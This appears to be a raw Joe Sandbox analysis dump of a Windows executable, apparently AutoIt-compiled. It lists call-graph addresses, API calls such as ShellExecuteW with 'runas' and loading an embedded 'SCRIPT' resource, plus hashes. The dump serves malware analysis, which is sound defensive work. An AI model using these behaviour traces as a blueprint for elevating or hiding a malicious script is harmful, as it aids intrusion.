97274 a08049 97255->97274 97297 a07e86 
97256->97297 97257->97272 97262 a082c8 97312 99fc70 97262->97312 97265 a08302 97319 9863eb 22 API calls 97265->97319 97266 a082e8 97318 9f359c 82 API calls __wsopen_s 97266->97318 97269 a082f3 GetCurrentProcess TerminateProcess 97269->97265 97270 a08311 97320 986a50 22 API calls 97270->97320 97272->96915 97273 a0832a 97282 a08352 97273->97282 97321 9904f0 22 API calls 97273->97321 97274->97250 97274->97255 97274->97272 97316 9e417d 22 API calls __fread_nolock 97274->97316 97317 a0851d 42 API calls _strftime 97274->97317 97275 a084c5 97275->97272 97280 a084d9 FreeLibrary 97275->97280 97277 a08341 97322 a08b7b 75 API calls 97277->97322 97280->97272 97282->97275 97323 9904f0 22 API calls 97282->97323 97324 98aceb 23 API calls messages 97282->97324 97326 a08b7b 75 API calls 97282->97326 97285 98aec9 22 API calls 97284->97285 97286 a08cee CharLowerBuffW 97285->97286 97327 9e8e54 97286->97327 97290 98a961 22 API calls 97291 a08d2a 97290->97291 97334 986d25 97291->97334 97293 a08d3e 97294 9893b2 22 API calls 97293->97294 97296 a08d48 _wcslen 97294->97296 97295 a08e5e _wcslen 97295->97274 97296->97295 97347 a0851d 42 API calls _strftime 97296->97347 97298 a07ea1 97297->97298 97302 a07eec 97297->97302 97299 99fe0b 22 API calls 97298->97299 97301 a07ec3 97299->97301 97300 99fddb 22 API calls 97300->97301 97301->97300 97301->97302 97303 a09096 97302->97303 97304 a092ab messages 97303->97304 97311 a090ba _strcat _wcslen 97303->97311 97304->97262 97305 98b567 39 API calls 97305->97311 97306 98b38f 39 API calls 97306->97311 97307 98b6b5 39 API calls 97307->97311 97308 987510 53 API calls 97308->97311 97309 9aea0c 21 API calls ___std_exception_copy 97309->97311 97311->97304 97311->97305 97311->97306 97311->97307 97311->97308 97311->97309 97351 9eefae 24 API calls _wcslen 97311->97351 97314 99fc85 97312->97314 97313 99fd1d VirtualAlloc 97315 99fceb 97313->97315 97314->97313 97314->97315 97315->97265 97315->97266 97316->97274 97317->97274 97318->97269 97319->97270 97320->97273 
97321->97277 97322->97282 97323->97282 97324->97282 97325->97254 97326->97282 97329 9e8e74 _wcslen 97327->97329 97328 9e8f63 97328->97290 97328->97296 97329->97328 97330 9e8f68 97329->97330 97331 9e8ea9 97329->97331 97330->97328 97349 99ce60 41 API calls 97330->97349 97331->97328 97348 99ce60 41 API calls 97331->97348 97335 986d91 97334->97335 97336 986d34 97334->97336 97337 9893b2 22 API calls 97335->97337 97336->97335 97338 986d3f 97336->97338 97339 986d62 __fread_nolock 97337->97339 97340 9c4c9d 97338->97340 97341 986d5a 97338->97341 97339->97293 97342 99fddb 22 API calls 97340->97342 97350 986f34 22 API calls 97341->97350 97344 9c4ca7 97342->97344 97345 99fe0b 22 API calls 97344->97345 97346 9c4cda 97345->97346 97347->97295 97348->97331 97349->97330 97350->97339 97351->97311 97353 9ae684 BuildCatchObjectHelperInternal 97352->97353 97354 9ae6aa 97353->97354 97355 9ae695 97353->97355 97364 9ae6a5 __fread_nolock 97354->97364 97365 9a918d EnterCriticalSection 97354->97365 97382 9af2d9 20 API calls __dosmaperr 97355->97382 97358 9ae69a 97383 9b27ec 26 API calls _strftime 97358->97383 97359 9ae6c6 97366 9ae602 97359->97366 97362 9ae6d1 97384 9ae6ee LeaveCriticalSection __fread_nolock 97362->97384 97364->96921 97365->97359 97367 9ae60f 97366->97367 97369 9ae624 97366->97369 97410 9af2d9 20 API calls __dosmaperr 97367->97410 97375 9ae61f 97369->97375 97385 9adc0b 97369->97385 97370 9ae614 97411 9b27ec 26 API calls _strftime 97370->97411 97375->97362 97377 9ad955 __fread_nolock 26 API calls 97378 9ae646 97377->97378 97395 9b862f 97378->97395 97381 9b29c8 _free 20 API calls 97381->97375 97382->97358 97383->97364 97384->97364 97386 9adc23 97385->97386 97390 9adc1f 97385->97390 97387 9ad955 __fread_nolock 26 API calls 97386->97387 97386->97390 97388 9adc43 97387->97388 97412 9b59be 97388->97412 97391 9b4d7a 97390->97391 97392 9b4d90 97391->97392 97393 9ae640 97391->97393 97392->97393 97394 9b29c8 _free 20 API calls 97392->97394 97393->97377 97394->97393 97396 9b863e 
97395->97396 97397 9b8653 97395->97397 97527 9af2c6 20 API calls __dosmaperr 97396->97527 97399 9b868e 97397->97399 97403 9b867a 97397->97403 97529 9af2c6 20 API calls __dosmaperr 97399->97529 97400 9b8643 97528 9af2d9 20 API calls __dosmaperr 97400->97528 97524 9b8607 97403->97524 97404 9b8693 97530 9af2d9 20 API calls __dosmaperr 97404->97530 97407 9ae64c 97407->97375 97407->97381 97408 9b869b 97531 9b27ec 26 API calls _strftime 97408->97531 97410->97370 97411->97375 97413 9b59ca BuildCatchObjectHelperInternal 97412->97413 97414 9b59d2 97413->97414 97416 9b59ea 97413->97416 97491 9af2c6 20 API calls __dosmaperr 97414->97491 97415 9b5a88 97496 9af2c6 20 API calls __dosmaperr 97415->97496 97416->97415 97421 9b5a1f 97416->97421 97419 9b59d7 97492 9af2d9 20 API calls __dosmaperr 97419->97492 97420 9b5a8d 97497 9af2d9 20 API calls __dosmaperr 97420->97497 97437 9b5147 EnterCriticalSection 97421->97437 97425 9b5a95 97498 9b27ec 26 API calls _strftime 97425->97498 97426 9b5a25 97428 9b5a41 97426->97428 97429 9b5a56 97426->97429 97493 9af2d9 20 API calls __dosmaperr 97428->97493 97438 9b5aa9 97429->97438 97431 9b59df __fread_nolock 97431->97390 97433 9b5a46 97494 9af2c6 20 API calls __dosmaperr 97433->97494 97434 9b5a51 97495 9b5a80 LeaveCriticalSection __wsopen_s 97434->97495 97437->97426 97439 9b5ad7 97438->97439 97479 9b5ad0 97438->97479 97440 9b5adb 97439->97440 97441 9b5afa 97439->97441 97506 9af2c6 20 API calls __dosmaperr 97440->97506 97444 9b5b4b 97441->97444 97445 9b5b2e 97441->97445 97442 9a0a8c CatchGuardHandler 5 API calls 97446 9b5cb1 97442->97446 97449 9b5b61 97444->97449 97512 9b9424 28 API calls __fread_nolock 97444->97512 97509 9af2c6 20 API calls __dosmaperr 97445->97509 97446->97434 97447 9b5ae0 97507 9af2d9 20 API calls __dosmaperr 97447->97507 97499 9b564e 97449->97499 97452 9b5b33 97510 9af2d9 20 API calls __dosmaperr 97452->97510 97454 9b5ae7 97508 9b27ec 26 API calls _strftime 97454->97508 97458 9b5ba8 97464 9b5bbc 97458->97464 97465 9b5c02 
WriteFile 97458->97465 97459 9b5b6f 97461 9b5b73 97459->97461 97462 9b5b95 97459->97462 97460 9b5b3b 97511 9b27ec 26 API calls _strftime 97460->97511 97466 9b5c69 97461->97466 97513 9b55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 97461->97513 97514 9b542e 45 API calls 3 library calls 97462->97514 97469 9b5bf2 97464->97469 97470 9b5bc4 97464->97470 97468 9b5c25 GetLastError 97465->97468 97473 9b5b8b 97465->97473 97466->97479 97521 9af2d9 20 API calls __dosmaperr 97466->97521 97468->97473 97517 9b56c4 7 API calls 2 library calls 97469->97517 97474 9b5bc9 97470->97474 97475 9b5be2 97470->97475 97473->97466 97473->97479 97483 9b5c45 97473->97483 97474->97466 97476 9b5bd2 97474->97476 97516 9b5891 8 API calls 2 library calls 97475->97516 97515 9b57a3 7 API calls 2 library calls 97476->97515 97478 9b5be0 97478->97473 97479->97442 97482 9b5c8e 97522 9af2c6 20 API calls __dosmaperr 97482->97522 97485 9b5c4c 97483->97485 97486 9b5c60 97483->97486 97518 9af2d9 20 API calls __dosmaperr 97485->97518 97520 9af2a3 20 API calls __dosmaperr 97486->97520 97489 9b5c51 97519 9af2c6 20 API calls __dosmaperr 97489->97519 97491->97419 97492->97431 97493->97433 97494->97434 97495->97431 97496->97420 97497->97425 97498->97431 97500 9bf89b __fread_nolock 26 API calls 97499->97500 97501 9b565e 97500->97501 97503 9b5663 97501->97503 97523 9b2d74 38 API calls 3 library calls 97501->97523 97503->97458 97503->97459 97504 9b5686 97504->97503 97505 9b56a4 GetConsoleMode 97504->97505 97505->97503 97506->97447 97507->97454 97508->97479 97509->97452 97510->97460 97511->97479 97512->97449 97513->97473 97514->97473 97515->97478 97516->97478 97517->97478 97518->97489 97519->97479 97520->97479 97521->97482 97522->97479 97523->97504 97532 9b8585 97524->97532 97526 9b862b 97526->97407 97527->97400 97528->97407 97529->97404 97530->97408 97531->97407 97533 9b8591 BuildCatchObjectHelperInternal 97532->97533 97543 9b5147 EnterCriticalSection 97533->97543 97535 9b859f 97536 9b85d1 97535->97536 97537 
9b85c6 97535->97537 97559 9af2d9 20 API calls __dosmaperr 97536->97559 97544 9b86ae 97537->97544 97540 9b85cc 97560 9b85fb LeaveCriticalSection __wsopen_s 97540->97560 97542 9b85ee __fread_nolock 97542->97526 97543->97535 97561 9b53c4 97544->97561 97546 9b86c4 97574 9b5333 21 API calls 2 library calls 97546->97574 97547 9b86be 97547->97546 97548 9b86f6 97547->97548 97550 9b53c4 __wsopen_s 26 API calls 97547->97550 97548->97546 97551 9b53c4 __wsopen_s 26 API calls 97548->97551 97553 9b86ed 97550->97553 97554 9b8702 FindCloseChangeNotification 97551->97554 97552 9b871c 97555 9b873e 97552->97555 97575 9af2a3 20 API calls __dosmaperr 97552->97575 97557 9b53c4 __wsopen_s 26 API calls 97553->97557 97554->97546 97558 9b870e GetLastError 97554->97558 97555->97540 97557->97548 97558->97546 97559->97540 97560->97542 97562 9b53d1 97561->97562 97563 9b53e6 97561->97563 97576 9af2c6 20 API calls __dosmaperr 97562->97576 97567 9b540b 97563->97567 97578 9af2c6 20 API calls __dosmaperr 97563->97578 97566 9b53d6 97577 9af2d9 20 API calls __dosmaperr 97566->97577 97567->97547 97568 9b5416 97579 9af2d9 20 API calls __dosmaperr 97568->97579 97570 9b53de 97570->97547 97572 9b541e 97580 9b27ec 26 API calls _strftime 97572->97580 97574->97552 97575->97555 97576->97566 97577->97570 97578->97568 97579->97572 97580->97570 97582 98a961 22 API calls 97581->97582 97583 985275 97582->97583 97584 98a961 22 API calls 97583->97584 97585 98527d 97584->97585 97586 98a961 22 API calls 97585->97586 97587 985285 97586->97587 97588 98a961 22 API calls 97587->97588 97589 98528d 97588->97589 97590 9c3df5 97589->97590 97591 9852c1 97589->97591 97592 98a8c7 22 API calls 97590->97592 97593 986d25 22 API calls 97591->97593 97594 9c3dfe 97592->97594 97595 9852cf 97593->97595 97596 98a6c3 22 API calls 97594->97596 97597 9893b2 22 API calls 97595->97597 97599 985304 97596->97599 97598 9852d9 97597->97598 97598->97599 97600 986d25 22 API calls 97598->97600 97603 985325 97599->97603 97613 9c3e20 97599->97613 97616 
985349 97599->97616 97602 9852fa 97600->97602 97601 986d25 22 API calls 97604 98535a 97601->97604 97605 9893b2 22 API calls 97602->97605 97603->97616 97637 984c6d 97603->97637 97607 985370 97604->97607 97612 98a8c7 22 API calls 97604->97612 97605->97599 97608 985384 97607->97608 97614 98a8c7 22 API calls 97607->97614 97611 98538f 97608->97611 97617 98a8c7 22 API calls 97608->97617 97610 986b57 22 API calls 97620 9c3ee0 97610->97620 97618 98a8c7 22 API calls 97611->97618 97622 98539a 97611->97622 97612->97607 97613->97610 97614->97608 97615 986d25 22 API calls 97615->97616 97616->97601 97617->97611 97618->97622 97619 984c6d 22 API calls 97619->97620 97620->97616 97620->97619 97640 9849bd 22 API calls __fread_nolock 97620->97640 97622->96945 97624 986362 97623->97624 97625 9c4a51 97623->97625 97641 986373 97624->97641 97651 984a88 22 API calls __fread_nolock 97625->97651 97628 98636e 97628->96952 97628->96954 97629 9c4a5b 97630 9c4a67 97629->97630 97631 98a8c7 22 API calls 97629->97631 97631->97630 97632->96969 97633->96973 97634->96974 97635->96971 97636->96971 97638 98aec9 22 API calls 97637->97638 97639 984c78 97638->97639 97639->97615 97639->97616 97640->97620 97642 986382 97641->97642 97648 9863b6 __fread_nolock 97641->97648 97643 9c4a82 97642->97643 97644 9863a9 97642->97644 97642->97648 97645 99fddb 22 API calls 97643->97645 97646 98a587 22 API calls 97644->97646 97647 9c4a91 97645->97647 97646->97648 97649 99fe0b 22 API calls 97647->97649 97648->97628 97650 9c4ac5 __fread_nolock 97649->97650 97651->97629 97785 984e90 LoadLibraryA 97652->97785 97657 9c3ccf 97660 984f39 68 API calls 97657->97660 97658 984ef6 LoadLibraryExW 97793 984e59 LoadLibraryA 97658->97793 97662 9c3cd6 97660->97662 97664 984e59 3 API calls 97662->97664 97666 9c3cde 97664->97666 97665 984f20 97665->97666 97667 984f2c 97665->97667 97815 9850f5 97666->97815 97668 984f39 68 API calls 97667->97668 97671 984f31 97668->97671 97671->96997 97671->96998 97673 9c3d05 97675 9ed7d8 97674->97675 97676 
9ed7dd 97675->97676 97677 9ed7f3 97675->97677 97680 98a8c7 22 API calls 97676->97680 97727 9ed7ee 97676->97727 97678 98a961 22 API calls 97677->97678 97679 9ed7fb 97678->97679 97681 98a961 22 API calls 97679->97681 97680->97727 97682 9ed803 97681->97682 97683 98a961 22 API calls 97682->97683 97684 9ed80e 97683->97684 97685 98a961 22 API calls 97684->97685 97686 9ed816 97685->97686 97687 98a961 22 API calls 97686->97687 97688 9ed81e 97687->97688 97689 98a961 22 API calls 97688->97689 97690 9ed826 97689->97690 97691 98a961 22 API calls 97690->97691 97692 9ed82e 97691->97692 97693 98a961 22 API calls 97692->97693 97694 9ed836 97693->97694 97695 98525f 22 API calls 97694->97695 97696 9ed84d 97695->97696 97697 98525f 22 API calls 97696->97697 97698 9ed866 97697->97698 97699 984c6d 22 API calls 97698->97699 97700 9ed872 97699->97700 97701 9ed885 97700->97701 97702 9893b2 22 API calls 97700->97702 97703 984c6d 22 API calls 97701->97703 97702->97701 97704 9ed88e 97703->97704 97705 9ed89e 97704->97705 97707 9893b2 22 API calls 97704->97707 97706 9ed8b0 97705->97706 97708 98a8c7 22 API calls 97705->97708 97709 986350 22 API calls 97706->97709 97707->97705 97708->97706 97710 9ed8bb 97709->97710 97962 9ed978 22 API calls 97710->97962 97712 9ed8ca 97963 9ed978 22 API calls 97712->97963 97714 9ed8dd 97715 984c6d 22 API calls 97714->97715 97716 9ed8e7 97715->97716 97717 9ed8fe 97716->97717 97718 9ed8ec 97716->97718 97720 984c6d 22 API calls 97717->97720 97719 9833c6 22 API calls 97718->97719 97722 9ed8f9 97719->97722 97721 9ed907 97720->97721 97723 9ed925 97721->97723 97724 9833c6 22 API calls 97721->97724 97725 986350 22 API calls 97722->97725 97726 986350 22 API calls 97723->97726 97724->97722 97725->97723 97726->97727 97727->97053 97729 9f2954 __wsopen_s 97728->97729 97730 99fe0b 22 API calls 97729->97730 97731 9f2971 97730->97731 97732 985722 22 API calls 97731->97732 97733 9f297b 97732->97733 97734 9f274e 27 API calls 97733->97734 97735 9f2986 97734->97735 97736 98511f 64 

                        Control-flow Graph

                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 0098430D
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • GetCurrentProcess.KERNEL32(?,00A1CB64,00000000,?,?), ref: 00984422
                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00984429
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00984454
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00984466
                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00984474
                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0098447B
                        • GetSystemInfo.KERNEL32(?,?,?), ref: 009844A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                        • API String ID: 3290436268-3101561225
                        • Opcode ID: fc97420d1b7fe941566ef820b6059a3e66487d6d04590a53ae1c73d25056773e
                        • Instruction ID: a7f3b2edaddff4581508c78fa4031abf1fbf7012244f5d541d93ad510794f461
                        • Opcode Fuzzy Hash: fc97420d1b7fe941566ef820b6059a3e66487d6d04590a53ae1c73d25056773e
                        • Instruction Fuzzy Hash: 5AA1816190E3C1DFC791D7F9B8A17B57FE87F26366B08889DD0419BB22D224450BDB22

                        Control-flow Graph

                        APIs
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009850AA,?,?,00000000,00000000), ref: 009842B2
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009850AA,?,?,00000000,00000000), ref: 009842C9
                        • LoadResource.KERNEL32(?,00000000,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20), ref: 009C35BE
                        • SizeofResource.KERNEL32(?,00000000,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20), ref: 009C35D3
                        • LockResource.KERNEL32(009850AA,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20,?), ref: 009C35E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: fbff5863f52f1426839a65224fc1f1a1ea73fb8c79b22aab6147a394f579019e
                        • Instruction ID: 00ae363332aad2e73e4c5a76ebbc77ce8a94a154d11c1ed47845b750edbae52f
                        • Opcode Fuzzy Hash: fbff5863f52f1426839a65224fc1f1a1ea73fb8c79b22aab6147a394f579019e
                        • Instruction Fuzzy Hash: C511AC70244305BFD721ABA5DC48FA77BBDEFC9B65F108169B412C6290DB71D8008620

                        Control-flow Graph

                        APIs
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00982B6B
                          • Part of subcall function 00983A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A51418,?,00982E7F,?,?,?,00000000), ref: 00983A78
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00A42224), ref: 009C2C10
                        • ShellExecuteW.SHELL32(00000000,?,?,00A42224), ref: 009C2C17
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                        • String ID: runas
                        • API String ID: 448630720-4000483414
                        • Opcode ID: f18b470166c10397c06ed8afc010704d61d570508902468dac83be15fd7c82e1
                        • Instruction ID: 370878f3dff25d940e36025d373a077db1be4a1b3c62bd020ad7ea865eaffe4a
                        • Opcode Fuzzy Hash: f18b470166c10397c06ed8afc010704d61d570508902468dac83be15fd7c82e1
                        • Instruction Fuzzy Hash: DD11D371608301AAC704FF70E851FBEB7A8ABD2751F44982DF082572A3CF358A4A8712
                        APIs
                        • lstrlenW.KERNEL32(?,009C5222), ref: 009EDBCE
                        • GetFileAttributesW.KERNELBASE(?), ref: 009EDBDD
                        • FindFirstFileW.KERNELBASE(?,?), ref: 009EDBEE
                        • FindClose.KERNEL32(00000000), ref: 009EDBFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirstlstrlen
                        • String ID:
                        • API String ID: 2695905019-0
                        • Opcode ID: 84afa12b2360a7ff756b09d1b8765c401b9a727bb25f3b7494dbd402a42ed21e
                        • Instruction ID: b7efda5b5700189591479785b48ecacf29bd9b92956087609dffcb14d8393ccb
                        • Opcode Fuzzy Hash: 84afa12b2360a7ff756b09d1b8765c401b9a727bb25f3b7494dbd402a42ed21e
                        • Instruction Fuzzy Hash: CBF0E530851910A7C221BBBCAD0D8EA376C9E01374B208702F8B6C20F0FBB45D66C6D6
                        APIs
                        • GetInputState.USER32 ref: 0098D807
                        • timeGetTime.WINMM ref: 0098DA07
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098DB28
                        • TranslateMessage.USER32(?), ref: 0098DB7B
                        • DispatchMessageW.USER32(?), ref: 0098DB89
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098DB9F
                        • Sleep.KERNEL32(0000000A), ref: 0098DBB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                        • String ID:
                        • API String ID: 2189390790-0
                        • Opcode ID: ebc2cf361f772e695331cff012712215859b479a36605ba9b1fdf4b575888f95
                        • Instruction ID: a002d815eed88b5eeb78a3a03021ebedf2e478f3c03c678a0822c06b10fe9d2e
                        • Opcode Fuzzy Hash: ebc2cf361f772e695331cff012712215859b479a36605ba9b1fdf4b575888f95
                        • Instruction Fuzzy Hash: C042F13064A341EFD728EF24C844BAAB7E9BF96310F14891AE495873D1D775E845CB82

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00982D07
                        • RegisterClassExW.USER32(00000030), ref: 00982D31
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00982D42
                        • InitCommonControlsEx.COMCTL32(?), ref: 00982D5F
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00982D6F
                        • LoadIconW.USER32(000000A9), ref: 00982D85
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00982D94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 3bd88cec7890456c743c8444193cd7171e8908d50e53988037d15c09cff8bd40
                        • Instruction ID: c60bf2f2a135450e20b5f6d66597f7dd8ff4ebabee5801ab6c57bba46ed07f1e
                        • Opcode Fuzzy Hash: 3bd88cec7890456c743c8444193cd7171e8908d50e53988037d15c09cff8bd40
                        • Instruction Fuzzy Hash: 8921C0B5941318EFDB00DFE4E889BEDBBB8FB08725F00811AF511A62A0D7B14546CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 302 9c065b-9c068b call 9c042f 305 9c068d-9c0698 call 9af2c6 302->305 306 9c06a6-9c06b2 call 9b5221 302->306 311 9c069a-9c06a1 call 9af2d9 305->311 312 9c06cb-9c0714 call 9c039a 306->312 313 9c06b4-9c06c9 call 9af2c6 call 9af2d9 306->313 322 9c097d-9c0983 311->322 320 9c0716-9c071f 312->320 321 9c0781-9c078a GetFileType 312->321 313->311 325 9c0756-9c077c GetLastError call 9af2a3 320->325 326 9c0721-9c0725 320->326 327 9c078c-9c07bd GetLastError call 9af2a3 CloseHandle 321->327 328 9c07d3-9c07d6 321->328 325->311 326->325 331 9c0727-9c0754 call 9c039a 326->331 327->311 339 9c07c3-9c07ce call 9af2d9 327->339 329 9c07df-9c07e5 328->329 330 9c07d8-9c07dd 328->330 334 9c07e9-9c0837 call 9b516a 329->334 335 9c07e7 329->335 330->334 331->321 331->325 345 9c0839-9c0845 call 9c05ab 334->345 346 9c0847-9c086b call 9c014d 334->346 335->334 339->311 345->346 353 9c086f-9c0879 call 9b86ae 345->353 351 9c086d 346->351 352 9c087e-9c08c1 346->352 351->353 355 9c08e2-9c08f0 352->355 356 9c08c3-9c08c7 352->356 353->322 359 9c097b 355->359 360 9c08f6-9c08fa 355->360 356->355 358 9c08c9-9c08dd 356->358 358->355 359->322 360->359 361 9c08fc-9c092f CloseHandle call 9c039a 360->361 364 9c0931-9c095d GetLastError call 9af2a3 call 9b5333 361->364 365 9c0963-9c0977 361->365 364->365 365->359
                        APIs
                          • Part of subcall function 009C039A: CreateFileW.KERNELBASE(00000000,00000000,?,009C0704,?,?,00000000,?,009C0704,00000000,0000000C), ref: 009C03B7
                        • GetLastError.KERNEL32 ref: 009C076F
                        • __dosmaperr.LIBCMT ref: 009C0776
                        • GetFileType.KERNELBASE(00000000), ref: 009C0782
                        • GetLastError.KERNEL32 ref: 009C078C
                        • __dosmaperr.LIBCMT ref: 009C0795
                        • CloseHandle.KERNEL32(00000000), ref: 009C07B5
                        • CloseHandle.KERNEL32(?), ref: 009C08FF
                        • GetLastError.KERNEL32 ref: 009C0931
                        • __dosmaperr.LIBCMT ref: 009C0938
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: 42664477c55d7a3e4acedf21075d90dd8135f1137c68017e636fa588e8f1a614
                        • Instruction ID: 213e79d321ebeb89e91e0c1b92901ae876ecf3b3907c2ce4436f78964ed8a885
                        • Opcode Fuzzy Hash: 42664477c55d7a3e4acedf21075d90dd8135f1137c68017e636fa588e8f1a614
